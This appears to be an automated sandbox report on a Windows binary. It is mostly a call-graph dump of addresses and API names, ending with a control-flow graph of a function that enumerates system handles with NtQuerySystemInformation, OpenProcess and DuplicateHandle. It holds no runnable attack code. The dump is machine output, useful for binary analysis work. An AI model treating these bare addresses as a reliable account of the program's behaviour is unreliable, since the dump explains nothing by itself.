39482 443db6 39463->39482 39485 4438d0 39484->39485 39491 4438c9 39484->39491 39486 415378 memcpy memcpy 39485->39486 39487 4438d5 39486->39487 39488 4154e2 10 API calls 39487->39488 39489 443906 39487->39489 39487->39491 39488->39489 39490 443970 memset 39489->39490 39489->39491 39492 44398b 39490->39492 39491->39390 39494 41975c 10 API calls 39492->39494 39496 4439a0 39492->39496 39493 415700 10 API calls 39495 4439c0 39493->39495 39494->39496 39495->39491 39497 418981 10 API calls 39495->39497 39496->39491 39496->39493 39497->39491 39499 415a77 39498->39499 39500 415a8d 39499->39500 39501 415a7e memset 39499->39501 39500->39393 39501->39500 39503 4438b5 11 API calls 39502->39503 39504 41525d 39503->39504 39504->39399 39506 444328 39505->39506 39507 444423 39506->39507 39508 44434e 39506->39508 39509 4446ea 11 API calls 39507->39509 39510 432d4e memset memset memcpy 39508->39510 39516 444381 39509->39516 39511 44435a 39510->39511 39513 444375 39511->39513 39518 44438b 39511->39518 39512 432d4e memset memset memcpy 39514 4443ec 39512->39514 39515 416935 16 API calls 39513->39515 39514->39516 39517 416935 16 API calls 39514->39517 39515->39516 39516->39405 39517->39516 39518->39512 39573 41703f 11 API calls 39572->39573 39574 43847a 39573->39574 39575 43848a 39574->39575 39576 43847e 39574->39576 39578 438270 133 API calls 39575->39578 39577 4446ea 11 API calls 39576->39577 39580 438488 39577->39580 39579 4384aa 39578->39579 39579->39580 39581 424f26 122 API calls 39579->39581 39580->39436 39582 4384bb 39581->39582 39583 438270 133 API calls 39582->39583 39583->39580 39585 424f1f 39584->39585 39586 424f0c 39584->39586 39588 424eea 11 API calls 39585->39588 39587 416760 11 API calls 39586->39587 39589 424f18 39587->39589 39590 424f24 39588->39590 39589->39439 39590->39439 39641 413f4f 39614->39641 39617 413f37 K32GetModuleFileNameExW 39618 413f4a 39617->39618 39618->38712 39620 413969 wcscpy 39619->39620 39621 41396c wcschr 39619->39621 39624 413a3a 39620->39624 39621->39620 39623 41398e 39621->39623 39646 4097f7 wcslen wcslen _memicmp 39623->39646 39624->38712 39626 41399a 39627 4139a4 memset 39626->39627 39628 4139e6 39626->39628 39647 409dd5 GetWindowsDirectoryW wcscpy 39627->39647 39629 413a31 wcscpy 39628->39629 39630 4139ec memset 39628->39630 39629->39624 39648 409dd5 GetWindowsDirectoryW wcscpy 39630->39648 39632 4139c9 wcscpy wcscat 39632->39624 39634 413a11 memcpy wcscat 39634->39624 39636 413cb0 GetModuleHandleW 39635->39636 39637 413cda 39635->39637 39636->39637 39638 413cbf GetProcAddress 39636->39638 39639 413ce3 GetProcessTimes 39637->39639 39640 413cf6 39637->39640 39638->39637 39639->38715 39640->38715 39642 413f2f 39641->39642 39643 413f54 39641->39643 39642->39617 39642->39618 39644 40a804 8 API calls 39643->39644 39645 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39644->39645 39645->39642 39646->39626 39647->39632 39648->39634 39649->38736 39650->38758 39652 409cf9 GetVersionExW 39651->39652 39653 409d0a 39651->39653 39652->39653 39653->38765 39653->38770 39654->38771 39655->38774 39656->38776 39657->38842 39659 40bba5 39658->39659 39706 40cc26 39659->39706 39662 40bd4b 39727 40cc0c 39662->39727 39667 40b2cc 27 API calls 39668 40bbef 39667->39668 39734 40ccf0 _wcsicmp 39668->39734 39670 40bbf5 39670->39662 39735 40ccb4 6 API calls 39670->39735 39672 40bc26 39673 40cf04 17 API calls 39672->39673 39674 40bc2e 39673->39674 39675 40bd43 39674->39675 39676 40b2cc 27 API calls 39674->39676 39677 40cc0c 4 API calls 39675->39677 39678 40bc40 39676->39678 39677->39662 39736 40ccf0 _wcsicmp 39678->39736 39680 40bc46 39680->39675 39681 40bc61 memset memset WideCharToMultiByte 39680->39681 39737 40103c strlen 39681->39737 39683 40bcc0 39684 40b273 27 API calls 39683->39684 39685 40bcd0 memcmp 39684->39685 39685->39675 39686 40bce2 39685->39686 39687 404423 37 API calls 39686->39687 39688 40bd10 39687->39688 39688->39675 39689 40bd3a LocalFree 39688->39689 39690 40bd1f memcpy 39688->39690 39689->39675 39690->39689 39691->38857 39693 409a74 GetTempFileNameW 39692->39693 39694 409a66 GetWindowsDirectoryW 39692->39694 39693->38854 39694->39693 39695->38892 39696->38892 39697->38892 39698->38892 39699->38892 39700->38892 39701->38892 39702->38892 39703->38892 39704->38867 39705->38889 39738 4096c3 CreateFileW 39706->39738 39708 40cc34 39709 40cc3d GetFileSize 39708->39709 39710 40bbca 39708->39710 39711 40afcf 2 API calls 39709->39711 39710->39662 39718 40cf04 39710->39718 39712 40cc64 39711->39712 39739 40a2ef ReadFile 39712->39739 39714 40cc71 39740 40ab4a MultiByteToWideChar 39714->39740 39716 40cc95 CloseHandle 39717 40b04b ??3@YAXPAX 39716->39717 39717->39710 39719 40b633 free 39718->39719 39720 40cf14 39719->39720 39746 40b1ab free free 39720->39746 39722 40bbdd 39722->39662 39722->39667 39723 40cf1b 39723->39722 39725 40cfef 39723->39725 39747 40cd4b 39723->39747 39726 40cd4b 14 API calls 39725->39726 39726->39722 39728 40b633 free 39727->39728 39729 40cc15 39728->39729 39730 40aa04 free 39729->39730 39731 40cc1d 39730->39731 39796 40b1ab free free 39731->39796 39733 40b7d4 memset CreateFileW 39733->38848 39733->38849 39734->39670 39735->39672 39736->39680 39737->39683 39738->39708 39739->39714 39741 40ab6b 39740->39741 39745 40ab93 39740->39745 39742 40a9ce 4 API calls 39741->39742 39743 40ab74 39742->39743 39744 40ab7c MultiByteToWideChar 39743->39744 39744->39745 39745->39716 39746->39723 39748 40cd7b 39747->39748 39781 40aa29 39748->39781 39750 40cef5 39751 40aa04 free 39750->39751 39752 40cefd 39751->39752 39752->39723 39754 40aa29 6 API calls 39755 40ce1d 39754->39755 39756 40aa29 6 API calls 39755->39756 39757 40ce3e 39756->39757 39758 40ce6a 39757->39758 39789 40abb7 wcslen memmove 39757->39789 39759 40ce9f 39758->39759 39792 40abb7 wcslen memmove 39758->39792 39761 40a8d0 7 API calls 39759->39761 39764 40ceb5 39761->39764 39762 40ce56 39790 40aa71 wcslen 39762->39790 39771 40a8d0 7 API calls 39764->39771 39766 40ce8b 39793 40aa71 wcslen 39766->39793 39768 40ce5e 39791 40abb7 wcslen memmove 39768->39791 39769 40ce93 39794 40abb7 wcslen memmove 39769->39794 39773 40cecb 39771->39773 39795 40d00b malloc memcpy free free 39773->39795 39775 40cedd 39776 40aa04 free 39775->39776 39777 40cee5 39776->39777 39778 40aa04 free 39777->39778 39779 40ceed 39778->39779 39780 40aa04 free 39779->39780 39780->39750 39782 40aa33 39781->39782 39788 40aa63 39781->39788 39783 40aa44 39782->39783 39784 40aa38 wcslen 39782->39784 39785 40a9ce malloc memcpy free free 39783->39785 39784->39783 39786 40aa4d 39785->39786 39787 40aa51 memcpy 39786->39787 39786->39788 39787->39788 39788->39750 39788->39754 39789->39762 39790->39768 39791->39758 39792->39766 39793->39769 39794->39759 39795->39775 39796->39733 39797->38907 39798->38915 39875 44def7 39876 44df07 39875->39876 39877 44df00 ??3@YAXPAX 39875->39877 39878 44df17 39876->39878 39879 44df10 ??3@YAXPAX 39876->39879 39877->39876 39880 44df27 39878->39880 39881 44df20 ??3@YAXPAX 39878->39881 39879->39878 39882 44df37 39880->39882 39883 44df30 ??3@YAXPAX 39880->39883 39881->39880 39883->39882 37675 44dea5 37676 44deb5 FreeLibrary 37675->37676 37677 44dec3 37675->37677 37676->37677 39884 4148b6 FindResourceW 39885 4148f9 39884->39885 39886 4148cf SizeofResource 39884->39886 39886->39885 39887 4148e0 LoadResource 39886->39887 39887->39885 39888 4148ee LockResource 39887->39888 39888->39885 37854 415304 free 39799 427533 39802 427548 39799->39802 39813 425711 39799->39813 39800 4259da 39856 416760 11 API calls 39800->39856 39801 4275cb 39836 425506 39801->39836 39802->39801 39809 429b7a 39802->39809 39804 4259c2 39832 425ad6 39804->39832 39850 415c56 11 API calls 39804->39850 39805 4260dd 39857 424251 119 API calls 39805->39857 39862 4446ce 11 API calls 39809->39862 39812 429a4d 39818 429a66 39812->39818 39819 429a9b 39812->39819 39813->39800 39813->39804 39813->39812 39816 422aeb memset memcpy memcpy 39813->39816 39821 4260a1 39813->39821 39828 429ac1 39813->39828 39835 425a38 39813->39835 39846 4227f0 memset memcpy 39813->39846 39847 422b84 15 API calls 39813->39847 39848 422b5d memset memcpy memcpy 39813->39848 39849 422640 13 API calls 39813->39849 39851 4241fc 11 API calls 39813->39851 39852 42413a 89 API calls 39813->39852 39816->39813 39858 415c56 11 API calls 39818->39858 39820 429a96 39819->39820 39860 416760 11 API calls 39819->39860 39861 424251 119 API calls 39820->39861 39855 415c56 11 API calls 39821->39855 39828->39800 39828->39832 39863 415c56 11 API calls 39828->39863 39829 429a7a 39859 416760 11 API calls 39829->39859 39835->39804 39853 422640 13 API calls 39835->39853 39854 4226e0 12 API calls 39835->39854 39837 425554 39836->39837 39838 42554d 39836->39838 39865 422586 12 API calls 39837->39865 39864 423b34 102 API calls 39838->39864 39841 425567 39842 4255ba 39841->39842 39843 42556c memset 39841->39843 39842->39813 39844 425596 39843->39844 39844->39842 39845 4255a4 memset 39844->39845 39845->39842 39846->39813 39847->39813 39848->39813 39849->39813 39850->39800 39851->39813 39852->39813 39853->39835 39854->39835 39855->39800 39856->39805 39857->39832 39858->39829 39859->39820 39860->39820 39861->39828 39862->39828 39863->39800 39864->39837 39865->39841 39889 441b3f 39899 43a9f6 39889->39899 39891 441b61 40072 4386af memset 39891->40072 39893 44189a 39894 4418e2 39893->39894 39895 442bd4 39893->39895 39896 4418ea 39894->39896 40073 4414a9 12 API calls 39894->40073 39895->39896 40074 441409 memset 39895->40074 39900 43aa20 39899->39900 39901 43aadf 39899->39901 39900->39901 39902 43aa34 memset 39900->39902 39901->39891 39903 43aa56 39902->39903 39904 43aa4d 39902->39904 40075 43a6e7 39903->40075 40083 42c02e memset 39904->40083 39909 43aad3 40085 4169a7 11 API calls 39909->40085 39910 43aaae 39910->39901 39910->39909 39925 43aae5 39910->39925 39911 43ac18 39914 43ac47 39911->39914 40087 42bbd5 memcpy memcpy memcpy memset memcpy 39911->40087 39915 43aca8 39914->39915 40088 438eed 16 API calls 39914->40088 39918 43acd5 39915->39918 40090 4233ae 11 API calls 39915->40090 40091 423426 11 API calls 39918->40091 39919 43ac87 40089 4233c5 16 API calls 39919->40089 39923 43ace1 40092 439811 162 API calls 39923->40092 39924 43a9f6 160 API calls 39924->39925 39925->39901 39925->39911 39925->39924 40086 439bbb 22 API calls 39925->40086 39927 43acfd 39933 43ad2c 39927->39933 40093 438eed 16 API calls 39927->40093 39929 43ad19 40094 4233c5 16 API calls 39929->40094 39930 43ad58 40095 44081d 162 API calls 39930->40095 39933->39930 39936 43add9 39933->39936 39935 43ae3a memset 39937 43ae73 39935->39937 39936->39936 40099 423426 11 API calls 39936->40099 40100 42e1c0 146 API calls 39937->40100 39938 43adab 40097 438c4e 162 API calls 39938->40097 39941 43ad6c 39941->39901 39941->39938 40096 42370b memset memcpy memset 39941->40096 39942 43adcc 40098 440f84 12 API calls 39942->40098 39943 43ae96 40101 42e1c0 146 API calls 39943->40101 39947 43aea8 39948 43aec1 39947->39948 40102 42e199 146 API calls 39947->40102 39950 43af00 39948->39950 40103 42e1c0 146 API calls 39948->40103 39950->39901 39953 43af1a 39950->39953 39954 43b3d9 39950->39954 40104 438eed 16 API calls 39953->40104 39961 43b4c8 39954->39961 39962 43b3f6 39954->39962 39956 43b60f 39956->39901 40163 4393a5 17 API calls 39956->40163 39957 43af2f 40105 4233c5 16 API calls 39957->40105 39960 43af51 40106 423426 11 API calls 39960->40106 39964 43b4f2 39961->39964 40151 42bbd5 memcpy memcpy memcpy memset memcpy 39961->40151 40145 432878 12 API calls 39962->40145 40152 43a76c 21 API calls 39964->40152 39966 43af7d 40107 423426 11 API calls 39966->40107 39970 43b529 40153 44081d 162 API calls 39970->40153 39971 43b462 40147 423330 11 API calls 39971->40147 39972 43af94 40108 423330 11 API calls 39972->40108 39976 43b47e 39980 43b497 39976->39980 40148 42374a memcpy memset memcpy memcpy memcpy 39976->40148 39977 43b544 39981 43b55c 39977->39981 40154 42c02e memset 39977->40154 39978 43b428 39978->39971 40146 432b60 16 API calls 39978->40146 39979 43afca 40109 423330 11 API calls 39979->40109 40149 4233ae 11 API calls 39980->40149 40155 43a87a 162 API calls 39981->40155 39983 43afdb 40110 4233ae 11 API calls 39983->40110 39989 43b56c 39992 43b58a 39989->39992 40156 423330 11 API calls 39989->40156 39990 43b4b1 40150 423399 11 API calls 39990->40150 39991 43afee 40111 44081d 162 API calls 39991->40111 40157 440f84 12 API calls 39992->40157 39997 43b4c1 40159 42db80 162 API calls 39997->40159 39999 43b592 40158 43a82f 16 API calls 39999->40158 40002 43b5b4 40160 438c4e 162 API calls 40002->40160 40004 43b5cf 40161 42c02e memset 40004->40161 40006 43b1ef 40122 4233c5 16 API calls 40006->40122 40007 43b005 40007->39901 40010 43b01f 40007->40010 40112 42d836 162 API calls 40007->40112 40010->40006 40120 423330 11 API calls 40010->40120 40121 42d71d 162 API calls 40010->40121 40011 43b212 40123 423330 11 API calls 40011->40123 40012 43b087 40113 4233ae 11 API calls 40012->40113 40014 43add4 40014->39956 40162 438f86 16 API calls 40014->40162 40018 43b22a 40124 42ccb5 11 API calls 40018->40124 40020 43b23f 40125 4233ae 11 API calls 40020->40125 40021 43b10f 40116 423330 11 API calls 40021->40116 40023 43b257 40126 4233ae 11 API calls 40023->40126 40027 43b129 40117 4233ae 11 API calls 40027->40117 40028 43b26e 40127 4233ae 11 API calls 40028->40127 40031 43b09a 40031->40021 40114 42cc15 19 API calls 40031->40114 40115 4233ae 11 API calls 40031->40115 40032 43b282 40128 43a87a 162 API calls 40032->40128 40034 43b13c 40118 440f84 12 API calls 40034->40118 40036 43b29d 40129 423330 11 API calls 40036->40129 40039 43b15f 40119 4233ae 11 API calls 40039->40119 40040 43b2af 40042 43b2b8 40040->40042 40043 43b2ce 40040->40043 40130 4233ae 11 API calls 40042->40130 40131 440f84 12 API calls 40043->40131 40046 43b2da 40132 42370b memset memcpy memset 40046->40132 40047 43b2c9 40133 4233ae 11 API calls 40047->40133 40050 43b2f9 40134 423330 11 API calls 40050->40134 40052 43b30b 40135 423330 11 API calls 40052->40135 40054 43b325 40136 423399 11 API calls 40054->40136 40056 43b332 40137 4233ae 11 API calls 40056->40137 40058 43b354 40138 423399 11 API calls 40058->40138 40060 43b364 40139 43a82f 16 API calls 40060->40139 40062 43b370 40140 42db80 162 API calls 40062->40140 40064 43b380 40141 438c4e 162 API calls 40064->40141 40066 43b39e 40142 423399 11 API calls 40066->40142 40068 43b3ae 40143 43a76c 21 API calls 40068->40143 40070 43b3c3 40144 423399 11 API calls 40070->40144 40072->39893 40073->39896 40074->39895 40076 43a6f5 40075->40076 40077 43a765 40075->40077 40076->40077 40164 42a115 40076->40164 40077->39901 40084 4397fd memset 40077->40084 40081 43a73d 40081->40077 40082 42a115 146 API calls 40081->40082 40082->40077 40083->39903 40084->39910 40085->39901 40086->39925 40087->39914 40088->39919 40089->39915 40090->39918 40091->39923 40092->39927 40093->39929 40094->39933 40095->39941 40096->39938 40097->39942 40098->40014 40099->39935 40100->39943 40101->39947 40102->39948 40103->39948 40104->39957 40105->39960 40106->39966 40107->39972 40108->39979 40109->39983 40110->39991 40111->40007 40112->40012 40113->40031 40114->40031 40115->40031 40116->40027 40117->40034 40118->40039 40119->40010 40120->40010 40121->40010 40122->40011 40123->40018 40124->40020 40125->40023 40126->40028 40127->40032 40128->40036 40129->40040 40130->40047 40131->40046 40132->40047 40133->40050 40134->40052 40135->40054 40136->40056 40137->40058 40138->40060 40139->40062 40140->40064 40141->40066 40142->40068 40143->40070 40144->40014 40145->39978 40146->39971 40147->39976 40148->39980 40149->39990 40150->39997 40151->39964 40152->39970 40153->39977 40154->39981 40155->39989 40156->39992 40157->39999 40158->39997 40159->40002 40160->40004 40161->40014 40162->39956 40163->39901 40165 42a175 40164->40165 40167 42a122 40164->40167 40165->40077 40170 42b13b 146 API calls 40165->40170 40167->40165 40168 42a115 146 API calls 40167->40168 40171 43a174 40167->40171 40195 42a0a8 146 API calls 40167->40195 40168->40167 40170->40081 40185 43a196 40171->40185 40186 43a19e 40171->40186 40172 43a306 40172->40185 40215 4388c4 14 API calls 40172->40215 40175 42a115 146 API calls 40175->40186 40177 43a642 40177->40185 40219 4169a7 11 API calls 40177->40219 40181 43a635 40218 42c02e memset 40181->40218 40185->40167 40186->40172 40186->40175 40186->40185 40196 42ff8c 40186->40196 40204 415a91 40186->40204 40208 4165ff 40186->40208 40211 439504 13 API calls 40186->40211 40212 4312d0 146 API calls 40186->40212 40213 42be4c memcpy memcpy memcpy memset memcpy 40186->40213 40214 43a121 11 API calls 40186->40214 40188 42bf4c 14 API calls 40190 43a325 40188->40190 40189 4169a7 11 API calls 40189->40190 40190->40177 40190->40181 40190->40185 40190->40188 40190->40189 40191 42b5b5 memset memcpy 40190->40191 40194 4165ff 11 API calls 40190->40194 40216 42b63e 14 API calls 40190->40216 40217 42bfcf memcpy 40190->40217 40191->40190 40194->40190 40195->40167 40220 43817e 40196->40220 40198 42ff9d 40198->40186 40199 42ff99 40199->40198 40200 42ffe3 40199->40200 40201 42ffd0 40199->40201 40225 4169a7 11 API calls 40200->40225 40224 4169a7 11 API calls 40201->40224 40205 415a9d 40204->40205 40206 415ab3 40205->40206 40207 415aa4 memset 40205->40207 40206->40186 40207->40206 40374 4165a0 40208->40374 40211->40186 40212->40186 40213->40186 40214->40186 40215->40190 40216->40190 40217->40190 40218->40177 40219->40185 40221 438187 40220->40221 40223 438192 40220->40223 40226 4380f6 40221->40226 40223->40199 40224->40198 40225->40198 40228 43811f 40226->40228 40227 438164 40227->40223 40228->40227 40231 437e5e 40228->40231 40254 4300e8 memset memset memcpy 40228->40254 40255 437d3c 40231->40255 40233 437eb3 40233->40228 40234 437ea9 40234->40233 40240 437f22 40234->40240 40270 41f432 40234->40270 40237 437f06 40317 415c56 11 API calls 40237->40317 40238 437f7f 40241 437f95 40238->40241 40244 43802b 40238->40244 40240->40238 40242 432d4e 3 API calls 40240->40242 40318 415c56 11 API calls 40241->40318 40242->40238 40245 4165ff 11 API calls 40244->40245 40246 438054 40245->40246 40281 437371 40246->40281 40249 43806b 40250 438094 40249->40250 40319 42f50e 137 API calls 40249->40319 40252 437fa3 40250->40252 40320 4300e8 memset memset memcpy 40250->40320 40252->40233 40321 41f638 103 API calls 40252->40321 40254->40228 40256 437d69 40255->40256 40259 437d80 40255->40259 40322 437ccb 11 API calls 40256->40322 40258 437d76 40258->40234 40259->40258 40260 437da3 40259->40260 40262 437d90 40259->40262 40263 438460 133 API calls 40260->40263 40262->40258 40326 437ccb 11 API calls 40262->40326 40266 437dcb 40263->40266 40264 437de8 40325 424f26 122 API calls 40264->40325 40266->40264 40323 444283 13 API calls 40266->40323 40268 437dfc 40324 437ccb 11 API calls 40268->40324 40271 41f54d 40270->40271 40277 41f44f 40270->40277 40272 41f466 40271->40272 40356 41c635 memset memset 40271->40356 40272->40237 40272->40240 40277->40272 40279 41f50b 40277->40279 40327 41f1a5 40277->40327 40352 41c06f memcmp 40277->40352 40353 41f3b1 89 API calls 40277->40353 40354 41f398 85 API calls 40277->40354 40279->40271 40279->40272 40355 41c295 85 API calls 40279->40355 40357 41703f 40281->40357 40283 437399 40284 43739d 40283->40284 40286 4373ac 40283->40286 40364 4446ea 11 API calls 40284->40364 40287 416935 16 API calls 40286->40287 40288 4373ca 40287->40288 40290 438460 133 API calls 40288->40290 40294 4251c4 136 API calls 40288->40294 40298 415a91 memset 40288->40298 40301 43758f 40288->40301 40313 437584 40288->40313 40316 437d3c 134 API calls 40288->40316 40365 425433 13 API calls 40288->40365 40366 425413 17 API calls 40288->40366 40367 42533e 16 API calls 40288->40367 40368 42538f 16 API calls 40288->40368 40369 42453e 122 API calls 40288->40369 40289 4375bc 40292 415c7d 16 API calls 40289->40292 40290->40288 40293 4375d2 40292->40293 40295 4442e6 11 API calls 40293->40295 40315 4373a7 40293->40315 40294->40288 40296 4375e2 40295->40296 40296->40315 40372 444283 13 API calls 40296->40372 40298->40288 40370 42453e 122 API calls 40301->40370 40302 4375f4 40307 437620 40302->40307 40308 43760b 40302->40308 40306 43759f 40309 416935 16 API calls 40306->40309 40311 416935 16 API calls 40307->40311 40373 444283 13 API calls 40308->40373 40309->40313 40311->40315 40313->40289 40371 42453e 122 API calls 40313->40371 40314 437612 memcpy 40314->40315 40315->40249 40316->40288 40317->40233 40318->40252 40319->40250 40320->40252 40321->40233 40322->40258 40323->40268 40324->40264 40325->40258 40326->40258 40328 41bc3b 100 API calls 40327->40328 40329 41f1b4 40328->40329 40330 41edad 85 API calls 40329->40330 40337 41f282 40329->40337 40331 41f1cb 40330->40331 40332 41f1f5 memcmp 40331->40332 40333 41f20e 40331->40333 40331->40337 40332->40333 40334 41f21b memcmp 40333->40334 40333->40337 40335 41f326 40334->40335 40338 41f23d 40334->40338 40336 41ee6b 85 API calls 40335->40336 40335->40337 40336->40337 40337->40277 40338->40335 40339 41f28e memcmp 40338->40339 40341 41c8df 55 API calls 40338->40341 40339->40335 40340 41f2a9 40339->40340 40340->40335 40343 41f308 40340->40343 40344 41f2d8 40340->40344 40342 41f269 40341->40342 40342->40335 40345 41f287 40342->40345 40346 41f27a 40342->40346 40343->40335 40350 4446ce 11 API calls 40343->40350 40347 41ee6b 85 API calls 40344->40347 40345->40339 40348 41ee6b 85 API calls 40346->40348 40349 41f2e0 40347->40349 40348->40337 40351 41b1ca memset 40349->40351 40350->40335 40351->40337 40352->40277 40353->40277 40354->40277 40355->40271 40356->40272 40358 417044 40357->40358 40359 41705c 40357->40359 40361 416760 11 API calls 40358->40361 40363 417055 40358->40363 40360 417075 40359->40360 40362 41707a 11 API calls 40359->40362 40360->40283 40361->40363 40362->40358 40363->40283 40364->40315 40365->40288 40366->40288 40367->40288 40368->40288 40369->40288 40370->40306 40371->40289 40372->40302 40373->40314 40379 415cfe 40374->40379 40383 415d23 __aullrem __aulldvrm 40379->40383 40386 41628e 40379->40386 40380 4163ca 40393 416422 11 API calls 40380->40393 40382 416172 memset 40382->40383 40383->40380 40383->40382 40384 416422 10 API calls 40383->40384 40385 415cb9 10 API calls 40383->40385 40383->40386 40384->40383 40385->40383 40387 416520 40386->40387 40388 416527 40387->40388 40392 416574 40387->40392 40390 416544 40388->40390 40388->40392 40394 4156aa 11 API calls 40388->40394 40391 416561 memcpy 40390->40391 40390->40392 40391->40392 40392->40186 40393->40386 40394->40390 40416 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37702 425711 37680->37702 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37702 37745 415c56 11 API calls 37699->37745 37701 429a96 37700->37701 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37701->37748 37702->37681 37702->37689 37702->37694 37702->37697 37703 4260a1 37702->37703 37712 4259c2 37702->37712 37715 425a38 37702->37715 37732 4227f0 memset memcpy 37702->37732 37733 422b84 15 API calls 37702->37733 37734 422b5d memset memcpy memcpy 37702->37734 37735 422640 13 API calls 37702->37735 37737 4241fc 11 API calls 37702->37737 37738 42413a 89 API calls 37702->37738 37741 415c56 11 API calls 37703->37741 37710 429a7a 37746 416760 11 API calls 37710->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37702 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37702 37733->37702 37734->37702 37735->37702 37736->37689 37737->37702 37738->37702 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37702 37745->37710 37746->37701 37747->37701 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37840 41bf99 85 API calls 37781->37840 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37805 418c63 37785->37805 37819 4446ce 11 API calls 37786->37819 37789 41be69 37789->37769 37789->37779 37790 41bee7 37790->37789 37823 41a453 85 API calls 37790->37823 37792->37789 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37822 4446ce 11 API calls 37793->37822 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37820 418a6d memset memcpy memset 37797->37820 37798->37789 37809 41ac13 37799->37809 37821 41a223 memset memcpy memset 37800->37821 37804 41bf20 37804->37798 37808 418c72 37805->37808 37806 418d51 memset memset 37807 418c94 37806->37807 37807->37792 37808->37806 37808->37807 37810 41ac52 37809->37810 37811 41ac3f memset 37809->37811 37814 41ac6a 37810->37814 37824 41dc14 19 API calls 37810->37824 37812 41acd9 37811->37812 37812->37790 37815 41aca1 37814->37815 37825 41519d 37814->37825 37815->37812 37817 41acc0 memset 37815->37817 37818 41accd memcpy 37815->37818 37817->37812 37818->37812 37819->37789 37820->37800 37821->37804 37822->37790 37824->37814 37828 4175ed 37825->37828 37836 417570 SetFilePointer 37828->37836 37831 41760a ReadFile 37833 417637 37831->37833 37834 417627 GetLastError 37831->37834 37832 4151b3 37832->37815 37833->37832 37835 41763e memset 37833->37835 37834->37832 37835->37832 37837 4175b2 37836->37837 37838 41759c GetLastError 37836->37838 37837->37831 37837->37832 37838->37837 37839 4175a8 GetLastError 37838->37839 37839->37837 37840->37782 37841 417bc5 37842 417c61 37841->37842 37843 417bda 37841->37843 37843->37842 37844 417bf6 UnmapViewOfFile CloseHandle 37843->37844 37846 417c2c 37843->37846 37848 4175b7 37843->37848 37844->37843 37844->37844 37846->37843 37853 41851e 18 API calls 37846->37853 37849 4175d6 CloseHandle 37848->37849 37850 4175c8 37849->37850 37851 4175df 37849->37851 37850->37851 37852 4175ce Sleep 37850->37852 37851->37843 37852->37849 37853->37846 39866 4147f3 39869 414561 39866->39869 39868 414813 39870 41456d 39869->39870 39871 41457f GetPrivateProfileIntW 39869->39871 39874 4143f1 memset _itow WritePrivateProfileStringW 39870->39874 39871->39868 39873 41457a 39873->39868 39874->39873

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
